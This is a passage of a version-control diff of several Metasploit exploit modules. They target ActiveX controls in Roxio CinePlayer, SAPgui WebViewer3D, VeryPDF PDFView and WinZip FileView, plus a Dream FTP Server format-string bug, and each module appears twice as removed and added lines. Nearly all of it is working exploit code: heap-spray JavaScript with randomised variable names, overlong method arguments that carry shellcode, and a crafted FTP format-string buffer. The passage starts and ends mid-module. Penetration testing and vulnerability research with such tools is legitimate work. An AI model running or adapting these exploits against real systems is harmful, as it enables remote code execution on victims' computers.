'Name' => 'Roxio CinePlayer ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in SonicPlayer ActiveX
control (SonicMediaPlayer.dll) 3.0.0.1 installed by Roxio CinePlayer 3.2.
By setting an overly long value to 'DiskType', an attacker can overrun
a buffer and execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'Trancer <mtrancer[at]gmail.com>' ],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2007-1559' ],
[ 'OSVDB', '34779' ],
[ 'BID', '23412' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x09\x0a\x0d'\\",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0', { 'Offset' => 200, 'Ret' => 0x0C0C0C0C } ]
],
'DisclosureDate' => 'Apr 11 2007',
'DefaultTarget' => 0))
end
def autofilter
false
end
def check_dependencies
use_zlib
end
def on_request_uri(cli, request)
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
# Encode the shellcode
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Setup exploit buffers
nops = Rex::Text.to_unescape([target.ret].pack('V'))
ret = Rex::Text.uri_encode([target.ret].pack('L'))
blocksize = 0x40000
fillto = 500
offset = target['Offset']
# Randomize the javascript variable names
sonic = rand_text_alpha(rand(100) + 1)
j_shellcode = rand_text_alpha(rand(100) + 1)
j_nops = rand_text_alpha(rand(100) + 1)
j_headersize = rand_text_alpha(rand(100) + 1)
j_slackspace = rand_text_alpha(rand(100) + 1)
j_fillblock = rand_text_alpha(rand(100) + 1)
j_block = rand_text_alpha(rand(100) + 1)
j_memory = rand_text_alpha(rand(100) + 1)
j_counter = rand_text_alpha(rand(30) + 2)
j_ret = rand_text_alpha(rand(100) + 1)
# Build out the message
content = %Q|
<html>
<object classid='clsid:9F1363DA-0220-462E-B923-9E3C9038896F' id='#{sonic}'></object>
<script language='javascript'>
#{j_shellcode}=unescape('#{shellcode}');
#{j_nops}=unescape('#{nops}');
#{j_headersize}=20;
#{j_slackspace}=#{j_headersize}+#{j_shellcode}.length;
while(#{j_nops}.length<#{j_slackspace})#{j_nops}+=#{j_nops};
#{j_fillblock}=#{j_nops}.substring(0,#{j_slackspace});
#{j_block}=#{j_nops}.substring(0,#{j_nops}.length-#{j_slackspace});
while(#{j_block}.length+#{j_slackspace}<#{blocksize})#{j_block}=#{j_block}+#{j_block}+#{j_fillblock};
#{j_memory}=new Array();
for(#{j_counter}=0;#{j_counter}<#{fillto};#{j_counter}++)#{j_memory}[#{j_counter}]=#{j_block}+#{j_shellcode};
#{j_ret}='';
for(#{j_counter}=0;#{j_counter}<=#{offset};#{j_counter}++)#{j_ret}+=unescape('#{ret}');
#{sonic}.DiskType(#{j_ret});
</script>
</html>
|
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
# Transmit the response to the client
send_response_html(cli, content)
# Handle the payload
handler(cli)
end
end
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Roxio CinePlayer ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in SonicPlayer ActiveX
control (SonicMediaPlayer.dll) 3.0.0.1 installed by Roxio CinePlayer 3.2.
By setting an overly long value to 'DiskType', an attacker can overrun
a buffer and execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'Trancer <mtrancer[at]gmail.com>' ],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2007-1559' ],
[ 'OSVDB', '34779' ],
[ 'BID', '23412' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x09\x0a\x0d'\\",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0', { 'Offset' => 200, 'Ret' => 0x0C0C0C0C } ]
],
'DisclosureDate' => 'Apr 11 2007',
'DefaultTarget' => 0))
end
def autofilter
false
end
def check_dependencies
use_zlib
end
def on_request_uri(cli, request)
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
# Encode the shellcode
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Setup exploit buffers
nops = Rex::Text.to_unescape([target.ret].pack('V'))
ret = Rex::Text.uri_encode([target.ret].pack('L'))
blocksize = 0x40000
fillto = 500
offset = target['Offset']
# Randomize the javascript variable names
sonic = rand_text_alpha(rand(100) + 1)
j_shellcode = rand_text_alpha(rand(100) + 1)
j_nops = rand_text_alpha(rand(100) + 1)
j_headersize = rand_text_alpha(rand(100) + 1)
j_slackspace = rand_text_alpha(rand(100) + 1)
j_fillblock = rand_text_alpha(rand(100) + 1)
j_block = rand_text_alpha(rand(100) + 1)
j_memory = rand_text_alpha(rand(100) + 1)
j_counter = rand_text_alpha(rand(30) + 2)
j_ret = rand_text_alpha(rand(100) + 1)
# Build out the message
content = %Q|
<html>
<object classid='clsid:9F1363DA-0220-462E-B923-9E3C9038896F' id='#{sonic}'></object>
<script language='javascript'>
#{j_shellcode}=unescape('#{shellcode}');
#{j_nops}=unescape('#{nops}');
#{j_headersize}=20;
#{j_slackspace}=#{j_headersize}+#{j_shellcode}.length;
while(#{j_nops}.length<#{j_slackspace})#{j_nops}+=#{j_nops};
#{j_fillblock}=#{j_nops}.substring(0,#{j_slackspace});
#{j_block}=#{j_nops}.substring(0,#{j_nops}.length-#{j_slackspace});
while(#{j_block}.length+#{j_slackspace}<#{blocksize})#{j_block}=#{j_block}+#{j_block}+#{j_fillblock};
#{j_memory}=new Array();
for(#{j_counter}=0;#{j_counter}<#{fillto};#{j_counter}++)#{j_memory}[#{j_counter}]=#{j_block}+#{j_shellcode};
#{j_ret}='';
for(#{j_counter}=0;#{j_counter}<=#{offset};#{j_counter}++)#{j_ret}+=unescape('#{ret}');
#{sonic}.DiskType(#{j_ret});
</script>
</html>
|
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
# Transmit the response to the client
send_response_html(cli, content)
# Handle the payload
handler(cli)
end
end

230
modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb
View File

@ -1,116 +1,116 @@
###
## This file is part of the Metasploit Framework and may be subject to
## redistribution and commercial restrictions. Please see the Metasploit
## Framework web site for more information on licensing and terms of use.
## http://metasploit.com/framework/
###
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
###
## This file is part of the Metasploit Framework and may be subject to
## redistribution and commercial restrictions. Please see the Metasploit
## Framework web site for more information on licensing and terms of use.
## http://metasploit.com/framework/
###
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'SAP AG SAPgui EAI WebViewer3D Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in Siemens Unigraphics Solutions
Teamcenter Visualization EAI WebViewer3D ActiveX control that is bundled
with SAPgui. When passing an overly long string the SaveViewToSessionFile()
method, arbitrary code may be executed.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2007-4475' ],
[ 'OSVDB', '53066' ],
[ 'US-CERT-VU','985449' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ]
],
'DisclosureDate' => 'Mar 31 2009',
'DefaultTarget' => 0))
end
def autofilter
false
end
def check_dependencies
use_zlib
end
def on_request_uri(cli, request)
# Re-generate the payload.
return if ((p = regenerate_payload(cli)) == nil)
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Create some nops.
nops = Rex::Text.to_unescape(make_nops(4))
# Set the return.
ret = Rex::Text.uri_encode(Metasm::Shellcode.assemble(Metasm::Ia32.new, "or cl,[edx]").encode_string * 2)
# Randomize the javascript variable names.
vname = rand_text_alpha(rand(100) + 1)
var_i = rand_text_alpha(rand(30) + 2)
rand1 = rand_text_alpha(rand(100) + 1)
rand2 = rand_text_alpha(rand(100) + 1)
rand3 = rand_text_alpha(rand(100) + 1)
rand4 = rand_text_alpha(rand(100) + 1)
rand5 = rand_text_alpha(rand(100) + 1)
rand6 = rand_text_alpha(rand(100) + 1)
rand7 = rand_text_alpha(rand(100) + 1)
rand8 = rand_text_alpha(rand(100) + 1)
content = %Q|
<html>
<object id='#{vname}' classid='clsid:AFBBE070-7340-11D2-AA6B-00E02924C34E'></object>
<script language="JavaScript">
var #{rand1} = unescape('#{shellcode}');
var #{rand2} = unescape('#{nops}');
var #{rand3} = 20;
var #{rand4} = #{rand3} + #{rand1}.length;
while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
var #{rand5} = #{rand2}.substring(0,#{rand4});
var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});
while (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};
var #{rand7} = new Array();
for (#{var_i} = 0; #{var_i} < 400; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }
var #{rand8} = "";
for (#{var_i} = 0; #{var_i} < 12500; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') }
#{vname}.SaveViewToSessionFile(#{rand8});
</script>
</html>
|
content = Rex::Text.randomize_space(content)
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
# Transmit the response to the client
send_response_html(cli, content)
# Handle the payload
handler(cli)
end
end
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'SAP AG SAPgui EAI WebViewer3D Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in Siemens Unigraphics Solutions
Teamcenter Visualization EAI WebViewer3D ActiveX control that is bundled
with SAPgui. When passing an overly long string the SaveViewToSessionFile()
method, arbitrary code may be executed.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2007-4475' ],
[ 'OSVDB', '53066' ],
[ 'US-CERT-VU','985449' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ]
],
'DisclosureDate' => 'Mar 31 2009',
'DefaultTarget' => 0))
end
def autofilter
false
end
def check_dependencies
use_zlib
end
def on_request_uri(cli, request)
# Re-generate the payload.
return if ((p = regenerate_payload(cli)) == nil)
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Create some nops.
nops = Rex::Text.to_unescape(make_nops(4))
# Set the return.
ret = Rex::Text.uri_encode(Metasm::Shellcode.assemble(Metasm::Ia32.new, "or cl,[edx]").encode_string * 2)
# Randomize the javascript variable names.
vname = rand_text_alpha(rand(100) + 1)
var_i = rand_text_alpha(rand(30) + 2)
rand1 = rand_text_alpha(rand(100) + 1)
rand2 = rand_text_alpha(rand(100) + 1)
rand3 = rand_text_alpha(rand(100) + 1)
rand4 = rand_text_alpha(rand(100) + 1)
rand5 = rand_text_alpha(rand(100) + 1)
rand6 = rand_text_alpha(rand(100) + 1)
rand7 = rand_text_alpha(rand(100) + 1)
rand8 = rand_text_alpha(rand(100) + 1)
content = %Q|
<html>
<object id='#{vname}' classid='clsid:AFBBE070-7340-11D2-AA6B-00E02924C34E'></object>
<script language="JavaScript">
var #{rand1} = unescape('#{shellcode}');
var #{rand2} = unescape('#{nops}');
var #{rand3} = 20;
var #{rand4} = #{rand3} + #{rand1}.length;
while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
var #{rand5} = #{rand2}.substring(0,#{rand4});
var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});
while (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};
var #{rand7} = new Array();
for (#{var_i} = 0; #{var_i} < 400; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }
var #{rand8} = "";
for (#{var_i} = 0; #{var_i} < 12500; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') }
#{vname}.SaveViewToSessionFile(#{rand8});
</script>
</html>
|
content = Rex::Text.randomize_space(content)
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
# Transmit the response to the client
send_response_html(cli, content)
# Handle the payload
handler(cli)
end
end

226
modules/exploits/windows/browser/verypdf_pdfview.rb
View File

@ -1,114 +1,114 @@
###
## This file is part of the Metasploit Framework and may be subject to
## redistribution and commercial restrictions. Please see the Metasploit
## Framework web site for more information on licensing and terms of use.
## http://metasploit.com/framework/
###
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
###
## This file is part of the Metasploit Framework and may be subject to
## redistribution and commercial restrictions. Please see the Metasploit
## Framework web site for more information on licensing and terms of use.
## http://metasploit.com/framework/
###
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'VeryPDF PDFView OCX ActiveX OpenPDF Heap Overflow',
'Description' => %q{
The VeryPDF PDFView ActiveX control is prone to a heap buffer-overflow
because it fails to properly bounds-check user-supplied data before copying
it into an insufficiently sized memory buffer. An attacker can exploit this issue
to execute arbitrary code within the context of the affected application.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC', 'dean <dean [at] zerodaysolutions [dot] com>' ],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2008-5492'],
[ 'OSVDB', '49871'],
[ 'BID','32313' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0c0c0c0c } ]
],
'DisclosureDate' => 'June 16 2008',
'DefaultTarget' => 0))
end
def autofilter
false
end
def check_dependencies
use_zlib
end
def on_request_uri(cli, request)
# Re-generate the payload.
return if ((p = regenerate_payload(cli)) == nil)
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Create some nops.
nops = Rex::Text.to_unescape(make_nops(4))
# Set the return.
ret = Rex::Text.uri_encode([target.ret].pack('L'))
# Randomize the javascript variable names.
vname = rand_text_alpha(rand(100) + 1)
var_i = rand_text_alpha(rand(30) + 2)
rand1 = rand_text_alpha(rand(100) + 1)
rand2 = rand_text_alpha(rand(100) + 1)
rand3 = rand_text_alpha(rand(100) + 1)
rand4 = rand_text_alpha(rand(100) + 1)
rand5 = rand_text_alpha(rand(100) + 1)
rand6 = rand_text_alpha(rand(100) + 1)
rand7 = rand_text_alpha(rand(100) + 1)
rand8 = rand_text_alpha(rand(100) + 1)
content = %Q|
<html>
<object id='#{vname}' classid='clsid:433268D7-2CD4-43E6-AA24-2188672E7252'></object>
<script language="JavaScript">
var #{rand1} = unescape('#{shellcode}');
var #{rand2} = unescape('#{ret}');
var #{rand3} = 20;
var #{rand4} = #{rand3} + #{rand1}.length;
while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
var #{rand5} = #{rand2}.substring(0,#{rand4});
var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});
while (#{rand6}.length + #{rand4} < 0x10000) #{rand6} = #{rand6} + #{rand6} + #{rand5};
var #{rand7} = new Array();
for (#{var_i} = 0; #{var_i} < 1000; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }
var #{rand8} = "";
for (#{var_i} = 0; #{var_i} < 7024; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') }
#{vname}.OpenPDF(#{rand8}, 1, 1);
</script>
</html>
|
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
# Transmit the response to the client
send_response_html(cli, content)
# Handle the payload
handler(cli)
end
end
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'VeryPDF PDFView OCX ActiveX OpenPDF Heap Overflow',
'Description' => %q{
The VeryPDF PDFView ActiveX control is prone to a heap buffer-overflow
because it fails to properly bounds-check user-supplied data before copying
it into an insufficiently sized memory buffer. An attacker can exploit this issue
to execute arbitrary code within the context of the affected application.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC', 'dean <dean [at] zerodaysolutions [dot] com>' ],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2008-5492'],
[ 'OSVDB', '49871'],
[ 'BID','32313' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0c0c0c0c } ]
],
'DisclosureDate' => 'June 16 2008',
'DefaultTarget' => 0))
end
def autofilter
false
end
def check_dependencies
use_zlib
end
def on_request_uri(cli, request)
# Re-generate the payload.
return if ((p = regenerate_payload(cli)) == nil)
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Create some nops.
nops = Rex::Text.to_unescape(make_nops(4))
# Set the return.
ret = Rex::Text.uri_encode([target.ret].pack('L'))
# Randomize the javascript variable names.
vname = rand_text_alpha(rand(100) + 1)
var_i = rand_text_alpha(rand(30) + 2)
rand1 = rand_text_alpha(rand(100) + 1)
rand2 = rand_text_alpha(rand(100) + 1)
rand3 = rand_text_alpha(rand(100) + 1)
rand4 = rand_text_alpha(rand(100) + 1)
rand5 = rand_text_alpha(rand(100) + 1)
rand6 = rand_text_alpha(rand(100) + 1)
rand7 = rand_text_alpha(rand(100) + 1)
rand8 = rand_text_alpha(rand(100) + 1)
content = %Q|
<html>
<object id='#{vname}' classid='clsid:433268D7-2CD4-43E6-AA24-2188672E7252'></object>
<script language="JavaScript">
var #{rand1} = unescape('#{shellcode}');
var #{rand2} = unescape('#{ret}');
var #{rand3} = 20;
var #{rand4} = #{rand3} + #{rand1}.length;
while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
var #{rand5} = #{rand2}.substring(0,#{rand4});
var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});
while (#{rand6}.length + #{rand4} < 0x10000) #{rand6} = #{rand6} + #{rand6} + #{rand5};
var #{rand7} = new Array();
for (#{var_i} = 0; #{var_i} < 1000; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }
var #{rand8} = "";
for (#{var_i} = 0; #{var_i} < 7024; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') }
#{vname}.OpenPDF(#{rand8}, 1, 1);
</script>
</html>
|
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
# Transmit the response to the client
send_response_html(cli, content)
# Handle the payload
handler(cli)
end
end

246
modules/exploits/windows/browser/winzip_fileview.rb
View File

@ -1,124 +1,124 @@
###
## This file is part of the Metasploit Framework and may be subject to
## redistribution and commercial restrictions. Please see the Metasploit
## Framework web site for more information on licensing and terms of use.
## http://metasploit.com/framework/
###
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
###
## This file is part of the Metasploit Framework and may be subject to
## redistribution and commercial restrictions. Please see the Metasploit
## Framework web site for more information on licensing and terms of use.
## http://metasploit.com/framework/
###
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:ua_name => HttpClients::IE,
:javascript => true,
:os_name => OperatingSystems::WINDOWS,
:vuln_test => 'CreateNewFolderFromName',
:classid => '{A09AE68F-B14D-43ED-B713-BA413F034904}',
:rank => NormalRanking # reliable memory corruption
})
def initialize(info = {})
super(update_info(info,
'Name' => 'WinZip FileView (WZFILEVIEW.FileViewCtrl.61) ActiveX Buffer Overflow',
'Description' => %q{
The FileView ActiveX control (WZFILEVIEW.FileViewCtrl.61) could allow a
remote attacker to execute arbitrary code on the system. The control contains
several unsafe methods and is marked safe for scripting and safe for initialization.
A remote attacker could exploit this vulnerability to execute arbitrary code on the
victim system. WinZip 10.0 <= Build 6667 are vulnerable.
},
'License' => MSF_LICENSE,
'Author' => [ 'dean <dean[at]zerodaysolutions.com>' ],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE','2006-5198' ],
[ 'OSVDB', '30433' ],
[ 'BID','21060' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP2/ IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0c0c0c0c } ]
],
'DisclosureDate' => 'Nov 2 2007',
'DefaultTarget' => 0))
end
def autofilter
false
end
def check_dependencies
use_zlib
end
def on_request_uri(cli, request)
# Re-generate the payload.
return if ((p = regenerate_payload(cli)) == nil)
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Set the return.
ret = Rex::Text.uri_encode([target.ret].pack('L'))
# Randomize the javascript variable names.
vname = rand_text_alpha(rand(100) + 1)
var_i = rand_text_alpha(rand(30) + 2)
rand1 = rand_text_alpha(rand(100) + 1)
rand2 = rand_text_alpha(rand(100) + 1)
rand3 = rand_text_alpha(rand(100) + 1)
rand4 = rand_text_alpha(rand(100) + 1)
rand5 = rand_text_alpha(rand(100) + 1)
rand6 = rand_text_alpha(rand(100) + 1)
rand7 = rand_text_alpha(rand(100) + 1)
rand8 = rand_text_alpha(rand(100) + 1)
content = %Q|
<html>
<object id='#{vname}' classid='clsid:A09AE68F-B14D-43ED-B713-BA413F034904'></object>
<script language="JavaScript">
var #{rand1} = unescape('#{shellcode}');
var #{rand2} = unescape('#{ret}');
var #{rand3} = 20;
var #{rand4} = #{rand3} + #{rand1}.length;
while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
var #{rand5} = #{rand2}.substring(0,#{rand4});
var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});
while (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};
var #{rand7} = new Array();
for (#{var_i} = 0; #{var_i} < 800; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }
var #{rand8} = "A";
for (#{var_i} = 0; #{var_i} < 1024; #{var_i}++) { #{rand8} = #{rand8} + #{rand2} }
#{vname}.CreateNewFolderFromName(#{rand8});
</script>
</html>
|
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
# Transmit the response to the client
send_response_html(cli, content)
# Handle the payload
handler(cli)
end
end
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:ua_name => HttpClients::IE,
:javascript => true,
:os_name => OperatingSystems::WINDOWS,
:vuln_test => 'CreateNewFolderFromName',
:classid => '{A09AE68F-B14D-43ED-B713-BA413F034904}',
:rank => NormalRanking # reliable memory corruption
})
def initialize(info = {})
super(update_info(info,
'Name' => 'WinZip FileView (WZFILEVIEW.FileViewCtrl.61) ActiveX Buffer Overflow',
'Description' => %q{
The FileView ActiveX control (WZFILEVIEW.FileViewCtrl.61) could allow a
remote attacker to execute arbitrary code on the system. The control contains
several unsafe methods and is marked safe for scripting and safe for initialization.
A remote attacker could exploit this vulnerability to execute arbitrary code on the
victim system. WinZip 10.0 <= Build 6667 are vulnerable.
},
'License' => MSF_LICENSE,
'Author' => [ 'dean <dean[at]zerodaysolutions.com>' ],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE','2006-5198' ],
[ 'OSVDB', '30433' ],
[ 'BID','21060' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP2/ IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0c0c0c0c } ]
],
'DisclosureDate' => 'Nov 2 2007',
'DefaultTarget' => 0))
end
def autofilter
false
end
def check_dependencies
use_zlib
end
def on_request_uri(cli, request)
# Re-generate the payload.
return if ((p = regenerate_payload(cli)) == nil)
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Set the return.
ret = Rex::Text.uri_encode([target.ret].pack('L'))
# Randomize the javascript variable names.
vname = rand_text_alpha(rand(100) + 1)
var_i = rand_text_alpha(rand(30) + 2)
rand1 = rand_text_alpha(rand(100) + 1)
rand2 = rand_text_alpha(rand(100) + 1)
rand3 = rand_text_alpha(rand(100) + 1)
rand4 = rand_text_alpha(rand(100) + 1)
rand5 = rand_text_alpha(rand(100) + 1)
rand6 = rand_text_alpha(rand(100) + 1)
rand7 = rand_text_alpha(rand(100) + 1)
rand8 = rand_text_alpha(rand(100) + 1)
content = %Q|
<html>
<object id='#{vname}' classid='clsid:A09AE68F-B14D-43ED-B713-BA413F034904'></object>
<script language="JavaScript">
var #{rand1} = unescape('#{shellcode}');
var #{rand2} = unescape('#{ret}');
var #{rand3} = 20;
var #{rand4} = #{rand3} + #{rand1}.length;
while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
var #{rand5} = #{rand2}.substring(0,#{rand4});
var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});
while (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};
var #{rand7} = new Array();
for (#{var_i} = 0; #{var_i} < 800; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }
var #{rand8} = "A";
for (#{var_i} = 0; #{var_i} < 1024; #{var_i}++) { #{rand8} = #{rand8} + #{rand2} }
#{vname}.CreateNewFolderFromName(#{rand8});
</script>
</html>
|
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
# Transmit the response to the client
send_response_html(cli, content)
# Handle the payload
handler(cli)
end
end

166
modules/exploits/windows/ftp/dreamftp_format.rb
View File

@ -1,87 +1,87 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'BolinTech Dream FTP Server 1.02 Format String',
'Description' => %q{
This module exploits a format string overflow in the BolinTech
Dream FTP Server version 1.02. Based on the exploit by SkyLined.
},
'Author' => [ 'Patrick Webster <patrick[at]aushack.com>' ],
'Arch' => [ ARCH_X86 ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2004-2074'],
[ 'OSVDB', '4986'],
[ 'BID', '9800'],
[ 'URL', 'http://www.milw0rm.com/exploits/823'],
],
'Platform' => ['win'],
'Privileged' => false,
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0a\x0d",
'StackAdjustment' => -3500,
},
'Targets' =>
[
# Patrick - Tested OK 2007/09/10 against w2ksp0, w2ksp4 en.
[
'Dream FTP Server v1.02 Universal',
{
'Offset' => 3957680, # 0x3c63ff-0x4f
}
],
],
'DisclosureDate' => 'Mar 03 2004',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(21),
], self.class)
end
def check
connect
banner = sock.get(-1,3)
disconnect
if (banner =~ /Dream FTP Server/)
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def exploit
connect
sleep(0.25)
sploit = "\xeb\x29"
sploit << "%8x%8x%8x%8x%8x%8x%8x%8x%" + target['Offset'].to_s + "d%n%n"
sploit << "@@@@@@@@" + payload.encoded
sock.put(sploit + "\r\n")
sleep(0.25)
handler
disconnect
end
def initialize(info = {})
super(update_info(info,
'Name' => 'BolinTech Dream FTP Server 1.02 Format String',
'Description' => %q{
This module exploits a format string overflow in the BolinTech
Dream FTP Server version 1.02. Based on the exploit by SkyLined.
},
'Author' => [ 'Patrick Webster <patrick[at]aushack.com>' ],
'Arch' => [ ARCH_X86 ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2004-2074'],
[ 'OSVDB', '4986'],
[ 'BID', '9800'],
[ 'URL', 'http://www.milw0rm.com/exploits/823'],
],
'Platform' => ['win'],
'Privileged' => false,
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0a\x0d",
'StackAdjustment' => -3500,
},
'Targets' =>
[
# Patrick - Tested OK 2007/09/10 against w2ksp0, w2ksp4 en.
[
'Dream FTP Server v1.02 Universal',
{
'Offset' => 3957680, # 0x3c63ff-0x4f
}
],
],
